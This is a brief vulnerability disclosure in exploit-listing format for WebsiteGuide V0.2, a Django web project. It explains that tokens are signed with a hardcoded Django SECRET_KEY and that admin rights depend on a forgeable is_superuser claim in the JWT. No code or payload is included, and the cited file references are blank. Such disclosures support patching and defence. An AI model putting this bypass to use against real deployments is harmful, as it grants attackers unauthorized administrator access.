Exploit Title: WebsiteGuide V0.2 Using insecure jwt for identity authentication
Date: 2023/11/9
Exploit Author: 5x
Vendor Homepage: https://github.com/mizhexiaoxiao/WebsiteGuide
Software Link: git clone https://github.com/mizhexiaoxiao/WebsiteGuide.git
Version: V0.2
Tested on: linux
In WebsiteGuide/settings.py, you can see that no secure jwt parameter is configured
Only the expiration time of JWT is configured for 5 days, and the JWT_SECRET_KEY is not configured, so the signing key for JWT is not explicitly set.
In this case, Django REST framework JWT defaults to using Django's SECRET_KEY as the signing key for JWT.
And Django's SECRET_KEY is hardcoded in the configuration file and does not use a strong randomly generated string, so anyone can generate new tokens to bypass JWT validation.
WebsiteGuide/settings.py
In WebsiteGuide/websiteapp/views. Py UserAuthView inside the class, we can see that the user authentication is through the JWT is_superuser parameters to judge whether the administrator privileges
WebsiteGuide/websiteapp/views.py::UserAuthView
